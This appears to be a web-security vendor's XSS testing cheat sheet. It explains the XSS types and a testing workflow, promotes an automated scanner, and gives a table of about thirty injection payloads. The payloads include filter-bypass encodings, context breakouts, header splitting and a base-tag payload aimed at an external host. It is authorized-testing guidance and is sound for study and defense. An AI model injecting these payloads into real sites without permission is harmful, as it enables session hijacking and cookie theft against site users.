Use this XSS cheat sheet to find cross-site scripting vulnerabilities faster, even if you are not a security expert.
What is XSS?
Cross-site scripting (XSS) is a common web application vulnerability that allows an attacker to inject malicious JavaScript into a page. When a browser executes the injected script, it can steal cookies, hijack sessions, modify page content, or perform actions on behalf of the user.
There are three main XSS types:
- Stored XSS: malicious input is saved on the server and served to visitors later.
- Reflected XSS: payload is reflected immediately in the response, often through URL parameters or form input.
- DOM-based XSS: the browser executes injected code from client-side JavaScript manipulation.
How to use this cheat sheet
These payloads are designed to trigger a JavaScript alert dialog, usually with alert(1). In a vulnerable input vector, the browser will execute the payload and show the alert box.
Typical test vectors include:
- URL query strings and fragment parameters
- HTML form fields and search boxes
- HTTP headers such as
RefererorUser-Agent - file upload metadata or JSON request bodies
Testing workflow
- Identify an input vector.
- Inject a payload into the parameter.
- Submit the request or reload the page.
- Look for the browser alert or unexpected script execution.
Testing strategy and limitations
1. Brute-force payload testing
Using a payload list means trying one payload after another until one succeeds.
Drawbacks of brute-force XSS testing:
- Manual testing is time-consuming.
- Automation still needs many requests and can be slow across a large site.
- Repeating many payloads increases the chance of Web Application Firewall (WAF) detection.
- Real applications may require custom encoding, escaping, or context-specific payloads.
- This cheat sheet is a starting point, not a complete WAF evasion guide.
⚠️ Warning: Use this guide only on applications you own or are authorized to test. Unauthorized scanning or exploitation is illegal and unethical.
2. Use a smarter approach with SmartScanner
SmartScanner automates XSS detection and reduces the need for manual payload enumeration. It analyzes the application context, tests the right vectors, and reports high-confidence XSS vulnerabilities quickly.
Find XSS in your website with SmartScanner
Common XSS payloads
Below are common payloads to test for reflected and DOM-based XSS. Many applications will accept variations, so adapt them to the target context.
| Payload | Comment |
|---|---|
<script>alert(1)</script> |
Classic script tag injection |
<svg/onload=alert(1)> |
SVG payload for HTML context |
<a href=javascript:alert(1)>click me</a> |
Link payload for HTML context |
"><svg/onload=alert(1)> |
Break out of double-quoted attribute |
'><svg/onload=alert(1)> |
Break out of single-quoted attribute |
</script><svg/onload=alert(1)> |
Close existing script block |
javascript:alert(1) |
URL-based XSS in href/src contexts |
"autofocus/onfocus="alert(1) |
Browser event-handler injection |
'autofocus/onfocus='alert(1) |
Single-quote attribute injection |
</textarea><svg/onload=alert(1)> |
Break out of textarea content |
</title><svg/onload=alert(1)> |
Break out of title tag context |
</noscript><svg/onload=alert(1)> |
Close noscript block and trigger payload |
</style><svg/onload=alert(1)> |
Close style block and inject HTML |
alert(1) |
Minimal payload for JS contexts |
${alert(1)} |
Template literal injection in JS contexts |
'-alert(1)-' |
String context closure with expression injection |
"-alert(1)-" |
Alternate string context closure |
\'-alert(1)// |
Escape out of single-quoted JS string |
\"-alert(1)// |
Escape out of double-quoted JS string |
\";alert(1)// |
Escape out of double-quoted JS string |
`-alert(1)-` |
Backtick string context injection |
\`-alert(1)// |
Backtick escape payload |
%26apos;-alert(1)-%26apos; |
HTML entity encoded single quote |
/alert(1)//\ |
Script injection in comment contexts |
--><svg/onload=alert(1)> |
Close HTML comment and inject payload |
<!--><svg/onload=alert(1)--> |
Alternate comment break-out payload |
\74img/src/onerror=alert(1)\76 |
Hex-encoded <img> tag for filter bypass |
1%0D%0AContent-Type:text/html%0D%0A<svg/onload=alert(1)> |
HTTP header splitting payload for text/html response |
"onload="alert(1) or "></iframe><svg/onload=alert(1)> |
Combined onload and iframe break payload |
javascript://%250Aalert(1)//?1 |
Percent-encoded JS URI payload |
[default]"> <svg/onload=alert(1)> |
Replace [default] with initial parameter value |
<base/href=//yoursite.com> |
Uses external script source for payload delivery |
Notes
- Adapt each payload to the target HTML or JavaScript context.
- Use browser developer tools or a proxy to inspect how the payload appears in the response.
- Confirm true XSS by checking the injected code path and not just an alert dialog.
- In practice, use any event handler that is valid in the target element, such as
onclick,onfocus,oninput,onmouseover, oronmouseenter, instead of relying only ononloadandonerror. - Always test only on targets you are authorized to scan.
